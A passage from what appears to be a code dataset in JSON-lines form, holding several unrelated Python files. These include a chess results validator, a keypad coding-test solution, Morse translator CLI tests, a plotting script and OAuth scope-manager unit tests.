True.\"\"\"\n state = False\n if self.round != other.round:\n if other.round:\n problems.add(constants.ROUND_DUP_REP)\n state = True\n if self.board != other.board:\n if other.board:\n problems.add(constants.BOARD_DUP_REP)\n state = True\n i = super().is_inconsistent(other, problems)\n return i or state\n\n def get_game_board_and_round(self):\n \"\"\"Return tuple(self.board, self.round) for tabular format.\"\"\"\n return (self.board, self.round)\n\n\nclass Section:\n \"\"\"Detail of a result extracted from a file of event reports.\"\"\"\n\n attributes = {\n \"competition\": None,\n \"order\": None, # f(source) for sorting\n \"source\": None, # tag to identify duplicate match reports\n \"games\": None,\n \"date\": None,\n \"day\": None,\n \"pdate\": None,\n \"dateok\": None,\n }\n\n def __init__(self, tagger=None, **kargs):\n \"\"\"Override, set default values for .attributes not in kargs.\"\"\"\n self.__dict__[\"tagger\"] = tagger\n for attribute in kargs:\n if attribute not in self.__class__.attributes:\n raise AttributeError(attribute)\n self.__dict__.update(self.attributes)\n self.__dict__.update(kargs)\n\n def __eq__(self, other):\n \"\"\"Return True if self[a] == other[a] for a in Section.attributes.\"\"\"\n for attribute in self.__class__.attributes:\n if self.__dict__[attribute] != other.__dict__[attribute]:\n return False\n return True\n\n def __ne__(self, other):\n \"\"\"Return True if self[a] != other[a] for a in Section.attributes.\"\"\"\n for attribute in self.__class__.attributes:\n if self.__dict__[attribute] != other.__dict__[attribute]:\n return True\n return False\n\n def __setattr__(self, name, value):\n \"\"\"Allow self[name] = value if name is in .attributes.\"\"\"\n if name in self.__class__.attributes:\n self.__dict__[name] = value\n else:\n raise AttributeError(name)\n\n def __hash__(self):\n \"\"\"Return object identity as hash value.\"\"\"\n return id(self)\n\n def __ge__(self, other):\n \"\"\"Return True if id(self) >= id(other).\"\"\"\n return id(self) >= id(other)\n\n def __gt__(self, other):\n \"\"\"Return True if id(self) > id(other).\"\"\"\n return id(self) > id(other)\n\n def __le__(self, other):\n \"\"\"Return True if id(self) <= id(other).\"\"\"\n return id(self) <= id(other)\n\n def __lt__(self, other):\n \"\"\"Return True if id(self) < id(other).\"\"\"\n return id(self) < id(other)\n\n @staticmethod\n def get_team_details():\n \"\"\"Return tuple of \"\"s for team details in tabular format.\"\"\"\n return (\"\",) * 6\n\n\nclass MatchReport(Section):\n \"\"\"Detail of a match result extracted from a file of match reports.\n\n MatchGame.attributes is Section.attributes plus round hometeam and so on\n\n \"\"\"\n\n attributes = {\n \"round\": None,\n \"hometeam\": None,\n \"homescore\": None,\n \"awayteam\": None,\n \"awayscore\": None,\n \"default\": None,\n }\n attributes.update(Section.attributes)\n\n def get_unfinished_games_and_score_consistency(self):\n \"\"\"Return (unfinished game, match and game score consistency).\n\n This method serves two masters: one treats an inconsistency as an error\n while the other treats it as a warning and makes use of the list of\n unfinished games in the returned tuple.\n\n \"\"\"\n ufg = []\n difference = 0\n points = 0\n force_inconsistent = False\n for game in self.games:\n if game.result not in displayresult:\n ufg.append(game)\n if game.is_game_counted_in_match_score():\n i = match_score_difference.get(game.result)\n if i is None:\n force_inconsistent = True\n else:\n difference += i\n i = match_score_total.get(game.result)\n if i is None:\n force_inconsistent = True\n else:\n points += i\n try:\n homepoints = float(self.homescore)\n except ValueError:\n homepoints = 0\n try:\n awaypoints = float(self.awayscore)\n except ValueError:\n awaypoints = 0\n if self.default and len(ufg) == 0:\n consistent = True\n elif points != homepoints + awaypoints:\n consistent = False\n elif difference != homepoints - awaypoints:\n consistent = False\n else:\n consistent = True\n return ufg, consistent or force_inconsistent\n\n def get_team_details(self):\n \"\"\"Return tuple of team details for tabular format.\"\"\"\n return (\n self.round,\n self.hometeam,\n self.homescore,\n self.awayteam,\n self.awayscore,\n self.default,\n )\n\n\nclass Player:\n \"\"\"A player in an event.\"\"\"\n\n # There is a design flaw here because the attributes 'tagger', '_identity',\n # and 'reported codes', are left out of 'attributes' because they do not\n # contribute to the __eq__ and __ne__ methods.\n # These should be included for the __setattr__ and __getattr__ methods.\n attributes = {\n \"name\": None,\n \"event\": None,\n \"startdate\": None,\n \"enddate\": None,\n \"section\": None, # eg. swiss tournament or league division\n \"club\": None, # the club played for in league\n \"pin\": None,\n \"affiliation\": None, # eg. club or location (ECF \"club\")\n }\n\n def __init__(self, tagger=None, reported_codes=None, **kargs):\n \"\"\"Override, set default values for .attributes not in kargs.\"\"\"\n self.__dict__[\"tagger\"] = tagger\n self.__dict__[\"reported_codes\"] = reported_codes\n for attribute in kargs:\n if attribute not in self.__class__.attributes:\n raise AttributeError(attribute)\n self.__dict__.update(self.attributes)\n self.__dict__.update(kargs)\n if self.club:\n self.set_player_identity_club()\n # Comment this line to avoid pylint unused-variable report.\n affiliation = self.club # Should this be \"self.affiliation =\"?\n elif self.section:\n self.set_player_identity_section()\n else:\n self.set_player_identity()\n\n def __eq__(self, other):\n \"\"\"Return True if self[a] == other[a] for a in Player.attributes.\"\"\"\n for attribute in Player.attributes:\n\n # Hack because Null instance represents a defaulting player, and\n # may get compared when sorting.\n try:\n if self.__dict__[attribute] != other.__dict__[attribute]:\n return False\n except KeyError:\n if isinstance(other, Null):\n return False\n raise\n return True\n\n def __ne__(self, other):\n \"\"\"Return True if self[a] != other[a] for a in Player.attributes.\"\"\"\n for attribute in Player.attributes:\n\n # Hack because Null instance represents a defaulting player, and\n # may get compared when sorting.\n try:\n if self.__dict__[attribute] != other.__getattr__(attribute):\n return True\n except KeyError:\n if isinstance(other, Null):\n return False\n raise\n return False\n\n # introduced for compatibility with NullPlayer class\n # guardian if statement probably not needed\n def __getattr__(self, name):\n \"\"\"Allow return self[name] if name is in .attributes.\"\"\"\n if name in self.__class__.attributes:\n return self.__dict__[name]\n raise AttributeError(name)\n\n def __setattr__(self, name, value):\n \"\"\"Allow self[name] = value if name is in .attributes.\"\"\"\n if name in self.__class__.attributes:\n self.__dict__[name] = value\n else:\n raise AttributeError(name)\n\n def __hash__(self):\n \"\"\"Return object identity as hash value.\"\"\"\n return id(self)\n\n def get_brief_identity(self):\n \"\"\"Return tuple(name, pin|club|False|None) elements of player identity.\n\n For use when dealing with players within a section of an event.\n\n \"\"\"\n if self.club:\n return (self.name, self.club)\n if self.section:\n if self.pin:\n return (self.name, self.pin)\n return (self.name, False)\n return (self.name, None)\n\n def get_full_identity(self):\n \"\"\"Return a tab separated string containing player identity.\"\"\"\n if self.club:\n return \"\\t\".join(\n (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.club,\n )\n )\n if self.section:\n if self.pin:\n return \"\\t\".join(\n (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.section,\n str(self.pin),\n )\n )\n return \"\\t\".join(\n (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.section,\n )\n )\n return \"\\t\".join((self.name, self.event, self.startdate, self.enddate))\n\n def get_identity(self):\n \"\"\"Return tuple of player identity with fillers for absent elements.\n\n For use as database key where known format helps a lot\n\n \"\"\"\n if self.club:\n return (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.club,\n None,\n )\n if self.section:\n if self.pin:\n return (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.section,\n self.pin,\n )\n return (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.section,\n False,\n )\n return (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n None,\n None,\n )\n\n def get_player_event(self):\n \"\"\"Return a tuple containing event part of player identity.\"\"\"\n return (self.event, self.startdate, self.enddate)\n\n def get_player_identity(self):\n \"\"\"Return tuple containing player identity.\"\"\"\n return self._identity\n\n def get_player_section(self):\n \"\"\"Return section part of player identity or None.\"\"\"\n if self.club:\n return self.club\n if self.section:\n return self.section\n return None\n\n def get_short_identity(self):\n \"\"\"Return tab separated string of player identity excluding event.\n\n Includes the section if present.\n\n \"\"\"\n if self.club:\n return \"\\t\\t\".join((self.name, self.club))\n if self.section:\n if self.pin:\n return \"\".join(\n (self.name, \"\\t\\t\", self.section, \" \", str(self.pin))\n )\n return \"\".join((self.name, \"\\t\\t\", self.section))\n return \"\\t\".join((self.name,))\n\n def is_inconsistent(self, other, problems):\n \"\"\"Return True if attribute values of self and other are inconsistent.\n\n Used to check that duplicate reports of a game are consistent allowing\n for previously unknown detail to be added. Such as the name of a\n player.\n\n \"\"\"\n del problems\n # state = False\n for attribute in Player.attributes:\n if self.__dict__[attribute] != other.__getattr__(attribute):\n if other.__getattr__(attribute):\n\n # Listing attribute names as problems may be too much.\n # problems.add(attribute)\n\n # state = True\n return True\n # return state\n return False\n\n def add_reported_codes(self, code):\n \"\"\"Add code(s) to self.reported_codes.\"\"\"\n self.__dict__[\"reported_codes\"].update(code)\n\n def get_reported_codes(self):\n \"\"\"Return space separated string of reported codes.\n\n Usually a grading code, but membership numbers and grades may be\n common too. Any element of 'name' containg a digit (0-9) will be\n treated as a code by the parser.\n\n \"\"\"\n return \" \".join(\n self.reported_codes if self.reported_codes is not None else \"\"\n )\n\n def set_player_identity(self):\n \"\"\"Set player identity where club or section is not relevant.\"\"\"\n self.__dict__[\"_identity\"] = (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n )\n\n def set_player_identity_club(self):\n \"\"\"Set player identity where club is relevant.\"\"\"\n self.__dict__[\"_identity\"] = (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.club,\n )\n\n def set_player_identity_section(self):\n \"\"\"Set player identity where section is relevant.\"\"\"\n self.__dict__[\"_identity\"] = (\n self.name,\n self.event,\n self.startdate,\n self.enddate,\n self.section,\n self.pin,\n )\n\n\n# GameCollation is superclass of Collation and CollationEvents, the latter used\n# when importing data from another database.\nclass GameCollation:\n \"\"\"Base class for results extracted from a file of game reports.\"\"\"\n\n def __init__(self):\n \"\"\"Define game and player dictionaries and error report list.\"\"\"\n super().__init__()\n self.games = dict()\n self.players = dict()\n\n def set_games(self, key, gamelist):\n \"\"\"Note gamelist in games dictionary under key.\"\"\"\n self.games[key] = gamelist\n\n def set_player(self, player):\n \"\"\"Note player in players dictionary under key if not present.\"\"\"\n key = player.get_player_identity()\n if key not in self.players:\n self.players[key] = player\n\n\n# The element names are in the order which gives a useful sort order.\nTabularReportRow = namedtuple(\n \"TabularReportRow\",\n constants.TABULAR_REPORT_ROW_ORDER,\n defaults=(\"\",) * len(constants.TABULAR_REPORT_ROW_ORDER),\n)\n\n\ndef get_game_rows_for_csv_format(collated_games):\n \"\"\"Return list of dicts representing collated games for an event.\n\n It is assumed sourceedit.SourceEdit._collate_unfinished_games()\n has been called if required.\n\n \"\"\"\n rows = []\n\n # The event name is only available as an attribute of the Player\n # instances found. All these instances must have the same event\n # name, except that defaulted games will produce None as the\n # event name for one or both players of a game.\n # Player represents a bundle of games reported under one name in\n # a section of an event: it does not represent the person playing\n # in an event or a game.\n # If eventname is None after processing the report either there\n # are no games or all games were double defaults.\n eventname = None\n\n for value in collated_games.values():\n (\n round_,\n hometeam,\n homescore,\n awayteam,\n awayscore,\n default,\n ) = value.get_team_details()\n if default:\n continue\n for game in value.games:\n if not game.gradegame:\n continue\n gameboard, gameround = game.get_game_board_and_round()\n if round_:\n if gameround and round_ != gameround:\n raise GameObjectsError(\n \"Inconsistent round given in game and section\"\n )\n\n # Note re-binding of homeplayer and awayplayer in this block.\n # Allow for double default games when checking consistency of\n # event name references.\n homeplayer = game.homeplayer\n awayplayer = game.awayplayer\n if (\n homeplayer is not None\n and awayplayer is not None\n and homeplayer.event is not None\n and awayplayer.event is not None\n ):\n if homeplayer.event != awayplayer.event:\n raise GameObjectsError(\n \"Inconsistent event names for players of game\"\n )\n game_eventname = homeplayer.event or awayplayer.event\n if eventname is None:\n eventname = game_eventname\n if (\n homeplayer.event is not None\n and awayplayer.event is not None\n and game_eventname != eventname\n ):\n raise GameObjectsError(\n \"Inconsistent event names for game in event\"\n )\n if homeplayer.reported_codes is not None:\n homeplayer = \" \".join(\n (\n \" \".join(homeplayer.reported_codes),\n homeplayer.name,\n )\n ).strip()\n else:\n homeplayer = homeplayer.name\n if awayplayer.reported_codes is not None:\n awayplayer = \" \".join(\n (\n awayplayer.name,\n \" \".join(awayplayer.reported_codes),\n )\n ).strip()\n else:\n awayplayer = awayplayer.name\n\n # The **{} arguments are in the default order of a tabular\n # source report. (The order before conversion to namedtuple.)\n rows.append(\n TabularReportRow(\n **{\n constants.REPORT_SECTION: value.competition,\n constants.REPORT_DAY: \"\",\n constants.REPORT_DATE: game.date,\n constants.REPORT_ROUND: gameround,\n constants.REPORT_HOME_TEAM: hometeam,\n constants.REPORT_HOME_TEAM_SCORE: homescore,\n constants.REPORT_HOME_PLAYER: homeplayer,\n constants.REPORT_RESULT: displayresult.get(\n game.result, \"\"\n ),\n constants.REPORT_AWAY_PLAYER: awayplayer,\n constants.REPORT_AWAY_TEAM_SCORE: awayscore,\n constants.REPORT_AWAY_TEAM: awayteam,\n constants.REPORT_BOARD: gameboard,\n constants.REPORT_HOME_PLAYER_COLOUR: (\n home_player_pieces[game.homeplayerwhite]\n ),\n constants.REPORT_EVENT: eventname,\n }\n )\n )\n\n return rows\n","repo_name":"RogerMarsh/chessvalidate","sub_path":"chessvalidate/core/gameobjects.py","file_name":"gameobjects.py","file_ext":"py","file_size_in_byte":32262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30338316477","text":"#1,4,7은 L, 3,6,9는 R을 Answer에 추가\n#2,5,8,0-> 1. 누가 더 가깝나 2. 같다면 무슨손 잡이인지\n#움직일때마다 각 손의 위치 저장\n#거리 정하는 함수 생성\nnumbers = [1, 3, 4, 5, 8, 2, 1, 4, 5, 9, 5]\nhand = \"right\"\nanswer = \"\"\np_dict = {1:(0,0), 2:(0,1), 3:(0,2), 4:(1,0), 5:(1,1),\n 6:(1,2), 7:(2,0), 8:(2,1), 9:(2,2), '*':(3,0), 0:(3,1), '#':(3,2)}\nl_pos = '*'\nr_pos = '#'\nfor i in numbers:\n if i in (1,4,7):\n answer += \"L\"\n l_pos = i\n elif i in (3,6,9):\n answer += \"R\"\n r_pos = i\n else:\n l_dis = abs(p_dict[l_pos][0]-p_dict[i][0])+abs(p_dict[l_pos][1]-p_dict[i][1])\n r_dis = abs(p_dict[r_pos][0]-p_dict[i][0])+abs(p_dict[r_pos][1]-p_dict[i][1])\n if l_dis < r_dis:\n answer += \"L\"\n l_pos = i\n elif l_dis > r_dis:\n answer += \"R\"\n r_pos = i\n else:\n if hand == \"right\":\n answer += \"R\"\n r_pos = i\n else:\n answer += \"L\"\n l_pos = i\nprint(answer)","repo_name":"minju7346/CordingTest","sub_path":"programmers/1_7.py","file_name":"1_7.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42562604459","text":"import unittest\nfrom parameterized import parameterized\nfrom morse_translator_cli import create_parser, process_args\n\n\nclass TestCLI(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.parser = create_parser()\n\n @parameterized.expand([\n ([\"--encode\", \"ABC\"], \"ABC\", True, False, \".\", \"-\", \" \", \"/\"),\n ([\"--decode\", \".- -... -.-.\"], \".- -... -.-.\", False, True, \".\", \"-\", \" \", \"/\"),\n (\n [\"--encode\", \"ABC\", \"--dot\", \"+\", \"--dash\", \"=\", \"--separator\", \"_\", \"--space\", \"&\"],\n \"ABC\", True, False, \"+\", \"=\", \"_\", \"&\"\n ),\n ])\n def test_parser(self, input_args, string, encode, decode, dot, dash, separator, space):\n args = self.parser.parse_args(input_args)\n self.assertEqual(string, args.string)\n self.assertEqual(encode, args.encode)\n self.assertEqual(decode, args.decode)\n self.assertEqual(dot, args.dot)\n self.assertEqual(dash, args.dash)\n self.assertEqual(separator, args.separator)\n self.assertEqual(space, args.space)\n\n @parameterized.expand([\n ([\"--encode\", \"ABC\"], \".- -... -.-.\"),\n ([\"--decode\", \".- -... -.-.\"], \"ABC\"),\n (\n [\"--encode\", \"ABC DE\", \"--dot\", \"+\", \"--dash\", \"=\", \"--separator\", \"_\", \"--space\", \"&\"],\n \"+=_=+++_=+=+_&_=++_+\"\n ),\n (\n [\"--decode\", \"+=_=+++_=+=+_&_=++_+\", \"--dot\", \"+\", \"--dash\", \"=\", \"--separator\", \"_\", \"--space\", \"&\"],\n \"ABC DE\"\n ),\n ])\n def test_process_args(self, input_args, expected):\n args = self.parser.parse_args(input_args)\n output = process_args(args)\n self.assertEqual(expected, output)\n\n def test_process_args_exception(self):\n with self.assertRaises(ValueError):\n args = self.parser.parse_args([\"ABC\"])\n process_args(args)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"vladhaidukkk/morse-translator","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19218515456","text":"import matplotlib.pyplot as plt\n\n#Questa funzione crea un grafico comparando le accuratezze su trainset e test seti di un dataset\ndef create_plot(name, percentages, accuracy_train, accuracy_validation, pruning):\n plt.plot(percentages, accuracy_train)\n plt.plot(percentages, accuracy_validation)\n if pruning == 0:\n plt.title(\"Curve di apprendimento \" + str(name) + \" SENZA pruning\")\n elif pruning == 1:\n plt.title(\"Curve di apprendimento \" + str(name) + \" CON pruning\")\n plt.xlabel(\"Percentuali apprendimento dataset\")\n plt.ylabel(\"Accuratezza su test set\")\n plt.legend(['Accuratezza training set', 'Accuratezza test set'])\n plt.show()\n\n#Questa funzione crea un grafico che compare due curve sul test set\ndef plot_comparation(name, percentages, frist_cruve, second_curve):\n plt.plot(percentages, frist_cruve)\n plt.plot(percentages, second_curve)\n plt.title(\"Confronto curve di apprendimento test set di:\" + str(name) )\n plt.xlabel(\"Percentuali apprendimento dataset\")\n plt.ylabel(\"Accuratezza su test set\")\n plt.legend(['Accuratezza senza pruning', 'Accuratezza con pruning'])\n plt.show()","repo_name":"iacopoerpichini/AI-Project","sub_path":"Codice/grafico.py","file_name":"grafico.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32554281920","text":"from time import time\nimport unittest\n\nfrom zope.interface import Interface\nimport zope.component\nfrom zope.schema.interfaces import WrongType, WrongContainedType\n\nfrom zExceptions import Forbidden\nfrom zExceptions import BadRequest\n\nfrom Products.PloneTestCase import ptc\n\nfrom pmr2.oauth.interfaces import KeyExistsError\nfrom pmr2.oauth.interfaces import IDefaultScopeManager\nfrom pmr2.oauth.scope import BTreeScopeManager, ContentTypeScopeManager\nfrom pmr2.oauth.scope import ContentTypeScopeProfile\n\nfrom pmr2.oauth.tests import base\n\n\nclass BTreeScopeManagerTestCase(unittest.TestCase):\n \"\"\"\n Test the storage and retrieval of client and access key specific\n scopes.\n \"\"\"\n\n def setUp(self):\n self.sm = BTreeScopeManager()\n self.client = 'client_key'\n self.access = 'access_key'\n\n def test_0000_base(self):\n self.assertRaises(KeyError, self.sm.delClientScope, self.client)\n self.assertRaises(KeyError, self.sm.delAccessScope, self.access)\n\n self.assertRaises(KeyError, self.sm.getClientScope, self.client)\n self.assertRaises(KeyError, self.sm.getAccessScope, self.access)\n\n self.assertTrue(\n self.sm.getClientScope(self.client, default=None) is None)\n self.assertTrue(\n self.sm.getAccessScope(self.access, default=None) is None)\n\n def test_0010_set_get(self):\n scope1 = 'http://example.com/scope.1'\n scope2 = 'http://example.com/scope.2'\n\n self.sm.setClientScope(self.client, scope1)\n self.assertEqual(self.sm.getClientScope(self.client), scope1)\n\n self.sm.setAccessScope(self.access, scope2)\n self.assertEqual(self.sm.getAccessScope(self.access), scope2)\n\n def test_0011_set_duplicate(self):\n scope1 = 'http://example.com/scope.1'\n scope2 = 'http://example.com/scope.2'\n\n self.sm.setClientScope(self.client, scope1)\n self.assertRaises(KeyExistsError, \n self.sm.setClientScope, self.client, scope1)\n\n self.sm.setAccessScope(self.access, scope2)\n self.assertRaises(KeyExistsError, \n self.sm.setAccessScope, self.access, scope2)\n\n def test_0020_del(self):\n scope1 = 'http://example.com/scope.1'\n scope2 = 'http://example.com/scope.2'\n\n self.sm.setClientScope(self.client, scope1)\n self.sm.delClientScope(self.client)\n # Can \"hide\" exception using optional parameter like get/set.\n self.sm.delClientScope(self.client, None)\n self.sm.setClientScope(self.client, scope2)\n self.assertEqual(self.sm.getClientScope(self.client), scope2)\n\n self.sm.setAccessScope(self.access, scope1)\n # This may be considered dangerous as this does not tie into the\n # access token in any way. Subclasses may need to handle this\n # to ensure the content owner is aware of scope changes.\n self.sm.delAccessScope(self.access)\n\n # New scope is updated.\n self.sm.setAccessScope(self.access, scope2)\n self.assertEqual(self.sm.getAccessScope(self.access), scope2)\n\n\nclass CTSMMappingTestCase(unittest.TestCase):\n \"\"\"\n Testing the profile and management within this scope manager.\n \"\"\"\n\n def setUp(self):\n self.sm = ContentTypeScopeManager()\n self.file_mapping = {'File': ['document_view']}\n self.folder_mapping = {'Folder': ['folder_contents']}\n\n def test_0100_get_mapping(self):\n self.assertRaises(KeyError, self.sm.getMapping, 1)\n self.assertEqual(self.sm.getMapping(1, default='test'), 'test')\n\n def test_0101_add_get_mapping(self):\n self.assertEqual(self.sm.addMapping('test'), 1)\n self.assertEqual(self.sm.getMapping(1), 'test')\n\n def test_0200_mapping_name_and_id(self):\n _marker = 2\n self.assertRaises(KeyError, self.sm.getMappingId, 'rawscope')\n self.sm.setMappingNameToId('rawscope', _marker)\n self.assertEqual(self.sm.getMappingId('rawscope'), _marker)\n self.sm.setMappingNameToId('rawscope', 3)\n self.assertEqual(self.sm.getMappingId('rawscope'), 3)\n self.sm.delMappingName('rawscope')\n self.assertRaises(KeyError, self.sm.getMappingId, 'rawscope')\n\n def test_1000_request_scope_fresh_fail(self):\n self.assertFalse(self.sm.requestScope('key', 'rawscope'))\n self.assertEqual(len(self.sm._scope), 0)\n\n def test_1001_request_scope_fresh_default(self):\n self.assertTrue(self.sm.requestScope('key', None))\n self.assertEqual(len(self.sm._scope), 1)\n # Can't set this again.\n self.assertRaises(KeyError, self.sm.requestScope, 'key', None)\n\n def test_1002_request_scope_set_singular(self):\n key = 'request_key'\n scope = 'test_scope'\n mapping_id = self.sm.addMapping(self.file_mapping)\n self.sm.setMappingNameToId(scope, mapping_id)\n self.assertTrue(self.sm.requestScope(key, scope))\n self.assertEqual(len(self.sm._scope), 1)\n mappings = self.sm.getScope(key)\n self.assertEqual(len(mappings), 1)\n self.assertTrue(mapping_id in mappings)\n # Obviously not an access scope.\n self.assertRaises(KeyError, self.sm.getAccessScope, key)\n # Nor a client scope.\n self.assertRaises(KeyError, self.sm.getClientScope, key)\n\n def test_1003_request_scope_multiple(self):\n file_id = self.sm.addMapping(self.file_mapping)\n folder_id = self.sm.addMapping(self.folder_mapping)\n self.sm.setMappingNameToId('file', file_id)\n self.sm.setMappingNameToId('folder', folder_id)\n\n key1 = 'request_key1'\n key2 = 'request_key2'\n raw_scope = 'test_scope'\n self.assertFalse(self.sm.requestScope(key1, 'test_scope'))\n # all of them must be valid.\n self.assertFalse(self.sm.requestScope(key1, \n 'http://nohost/plone/scope/file,test_scope'))\n self.assertTrue(self.sm.requestScope(key1, \n 'http://nohost/plone/scope/file,http://nohost/plone/scope/folder'))\n\n mappings = self.sm.getScope(key1)\n self.assertEqual(len(mappings), 2)\n self.assertTrue(file_id in mappings)\n self.assertTrue(folder_id in mappings)\n\n self.assertTrue(self.sm.requestScope(key2, \n 'http://nohost/plone/scope/folder'))\n mappings = self.sm.getScope(key2)\n self.assertEqual(len(mappings), 1)\n self.assertTrue(file_id not in mappings)\n\n\nclass CTSMEditingTestCase(unittest.TestCase):\n \"\"\"\n Testing the profile and management within this scope manager.\n \"\"\"\n\n def setUp(self):\n self.sm = ContentTypeScopeManager()\n self.file_profile = ContentTypeScopeProfile()\n self.file_profile.mapping = {'File': ['document_view']}\n self.folder_profile = ContentTypeScopeProfile()\n self.folder_profile.mapping = {'Folder': ['folder_contents']}\n\n def test_0001_edit(self):\n self.sm.setEditProfile('file', None)\n self.assertRaises(AssertionError, \n self.sm.setEditProfile, 'file', object())\n\n self.sm.setEditProfile('file', self.file_profile)\n self.assertEqual(self.sm.getEditProfile('file'), self.file_profile)\n\n def test_0002_commit_del(self):\n self.sm.setEditProfile('file', self.file_profile)\n self.sm.commitEditProfile('file')\n self.assertEqual(self.sm.getMappingByName('file'),\n self.file_profile.mapping)\n mapping_id = self.sm.getMappingId('file')\n self.assertEqual(self.sm.getMappingMethods(mapping_id),\n ['GET', 'HEAD', 'OPTIONS'])\n\n self.sm.delMappingName('file')\n self.assertEqual(self.sm.getEditProfile('file'), None)\n self.assertEqual(self.sm.getMappingByName('file', default=None), None)\n\n\nclass CTSMPloneIntegrationTestCase(ptc.PloneTestCase):\n \"\"\"\n Testing the validation on just the objects with the provided \n mapping and other Plone integration.\n \"\"\"\n\n def afterSetUp(self):\n self.sm = ContentTypeScopeManager()\n self.mapping = {}\n\n def assertScopeValid(self, accessed, name):\n self.assertTrue(self.sm.validateTargetWithMapping(\n accessed, name, self.mapping))\n\n def assertScopeInvalid(self, accessed, name):\n self.assertFalse(self.sm.validateTargetWithMapping(\n accessed, name, self.mapping))\n\n def test_0000_resolve_target(self):\n obj, path = self.sm.resolveTarget(self.folder, 'folder_contents')\n self.assertEqual(obj, 'Folder')\n self.assertEqual(path, 'folder_contents')\n\n def test_0001_resolve_subtarget(self):\n folder_add = self.folder.restrictedTraverse('+')\n obj, path = self.sm.resolveTarget(folder_add, 'addFolder')\n self.assertEqual(obj, 'Folder')\n self.assertEqual(path, '+/addFolder')\n\n def test_0002_resolve_nothing(self):\n obj, path = self.sm.resolveTarget(object(), 'addFolder')\n self.assertEqual(obj, None)\n self.assertEqual(path, None)\n\n def test_0100_root_scope(self):\n self.mapping = {\n 'Plone Site': ['folder_contents'],\n }\n self.assertScopeValid(self.portal, 'folder_contents')\n self.assertScopeInvalid(self.portal, 'manage')\n\n def test_0101_folder_scope(self):\n self.mapping = {\n 'Folder': ['folder_contents'],\n }\n self.assertScopeValid(self.folder, 'folder_contents')\n\n def test_0201_browser_view(self):\n self.mapping = {\n 'Folder': ['+/addFile', 'folder_contents'],\n }\n # Adding views.\n folder_add = self.folder.restrictedTraverse('+')\n self.assertScopeValid(folder_add, 'addFile')\n self.assertScopeInvalid(folder_add, 'addFolder')\n self.assertScopeInvalid(self.folder, 'addFile')\n\n # For whatever reason this happened, but still forbidden by\n # scope restrictions.\n portal_add = self.portal.unrestrictedTraverse('+')\n self.assertScopeInvalid(portal_add, 'addFile')\n\n def test_0301_asterisk_ending(self):\n self.mapping = {\n 'Folder': ['folder*contents', 'test_*'],\n 'Plone Site': ['test/test_*', 'test/view*me', 'example/*'],\n }\n\n self.assertScopeInvalid(self.folder, 'folder_contents')\n self.assertScopeInvalid(self.folder, 'test_view')\n self.assertScopeInvalid(self.folder, 'test_')\n\n self.assertScopeInvalid(self.portal, 'test_')\n self.assertScopeInvalid(self.portal, 'test/test')\n self.assertScopeInvalid(self.portal, 'test/view_me')\n self.assertScopeValid(self.portal, 'test/test_')\n self.assertScopeValid(self.portal, 'test/test_view')\n self.assertScopeValid(self.portal, 'test/test_page')\n\n # invalid for now\n self.assertScopeInvalid(self.portal, 'example')\n self.assertScopeValid(self.portal, 'example/')\n self.assertScopeValid(self.portal, 'example/a')\n\n\nclass CTSMValidateTestCase(ptc.PloneTestCase):\n \"\"\"\n Testing the validation process.\n \"\"\"\n\n def afterSetUp(self):\n self.sm = ContentTypeScopeManager()\n self.file_mapping = {'File': ['document_view']}\n self.folder_mapping = {'Folder': ['folder_contents', '+/addFile']}\n file_id = self.sm.addMapping(self.file_mapping)\n folder_id = self.sm.addMapping(self.folder_mapping)\n self.sm.setMappingNameToId('file', file_id)\n self.sm.setMappingNameToId('folder', folder_id)\n self.folder_add = self.folder.restrictedTraverse('+')\n\n self.all_ids = set([file_id, folder_id])\n\n def test_0100_request_to_access(self):\n rkey = 'request_key'\n akey = 'access_key'\n self.assertTrue(self.sm.requestScope(rkey, \n 'http://nohost/plone/scope/file,http://nohost/plone/scope/folder'))\n\n self.sm.setAccessScope(akey, self.sm.getScope(rkey))\n self.assertEqual(self.sm.getAccessScope(akey), self.all_ids)\n # Should there be something to automatically revoke it?\n # Probably?\n\n request = base.TestRequest()\n\n self.assertFalse(self.sm.validate(request, '', akey, self.folder,\n self.portal, 'document_view', object()))\n self.assertTrue(self.sm.validate(request, '', akey, self.folder,\n self.portal, 'folder_contents', object()))\n\n self.assertFalse(self.sm.validate(request, '', akey, self.folder_add,\n self.portal, 'addFolder', object()))\n self.assertTrue(self.sm.validate(request, '', akey, self.folder_add,\n self.portal, 'addFile', object()))\n\n # TODO test cases where mappings have been purged but the\n # token references to them were not.\n\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(BTreeScopeManagerTestCase))\n suite.addTest(makeSuite(CTSMMappingTestCase))\n suite.addTest(makeSuite(CTSMEditingTestCase))\n suite.addTest(makeSuite(CTSMPloneIntegrationTestCase))\n suite.addTest(makeSuite(CTSMValidateTestCase))\n return suite\n","repo_name":"PMR2/pmr2.oauth","sub_path":"pmr2/oauth/tests/test_scope.py","file_name":"test_scope.py","file_ext":"py","file_size_in_byte":13001,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"1475662888","text":"# 给最终用户的接口, 从 redis 取 okex websockets 的数据\nimport asyncio\nimport json\nimport logging\nfrom typing import Union\n\nimport aioredis\n\nfrom okws.interceptor import execute\nfrom okws.ws2redis.candle import config as candle\nfrom okws.ws2redis.normal import config as normal\nfrom .settings import default_settings\n\nlogger = 